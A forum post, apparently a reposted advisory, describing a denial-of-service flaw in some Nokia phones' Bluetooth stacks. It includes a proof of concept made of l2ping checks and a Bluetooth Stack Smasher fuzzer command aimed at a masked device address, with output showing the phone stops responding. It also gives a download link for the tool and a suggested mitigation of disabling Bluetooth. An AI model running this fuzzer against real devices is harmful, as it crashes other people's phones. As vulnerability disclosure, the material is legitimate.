Jump to content
MiniDisc

Nokia bluetooth stack attack (BlueTooth)

Recommended Posts

Posted

Most of Nokia cell phones sold now are Bluetooth compliant. Bluetooth is not enabled by default.

Lots of users use it with several other devices (earsets, GPS systems, and so on).

More information about these devices on http:[click]

This flaw was found using the BSS tool ( Bluetooth Stack Smasher : http:[click] ).

According to the firmware version and to the model, the device can be halted or can display a "System error" message ( http:[click] )

Other Nokia devices may be affected and should be tested with bss fuzzer. Solution is to switch off bluetooth on the phone.

A firmware upgrade may be distributed later by vendor.

Proof of Concept :

------------------

# l2ping -c 3 00:15:A0:@X:@X:@X

Ping: 00:15:A0:@X:@X:@X from 00:20:E0:75:83:DA (data size 44) ...

0 bytes from 00:15:A0:@X:@X:@X id 0 time 64.18ms

0 bytes from 00:15:A0:@X:@X:@X id 1 time 43.94ms

0 bytes from 00:15:A0:@X:@X:@X id 2 time 37.25ms

3 sent, 3 received, 0% loss

# ./bss -m 12 -s 1000 00:15:A0:@X:@X:@X

(... snip ...)

# l2ping -c 1 00:15:A0:@X:@X:@X

Ping: 00:15:A0:@X:@X:@X from 00:20:E0:75:83:DA (data size 24b) ...

no response from 00:80:37:ZZ:ZZ:ZZ id 0

1 sent, 0 received, 100% loss

BSS v0.6

http://www.secuobs.com/bss-0.6.tar.gz

asa arata display-ul telefonului dupa atac

crashn704qs.jpg

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...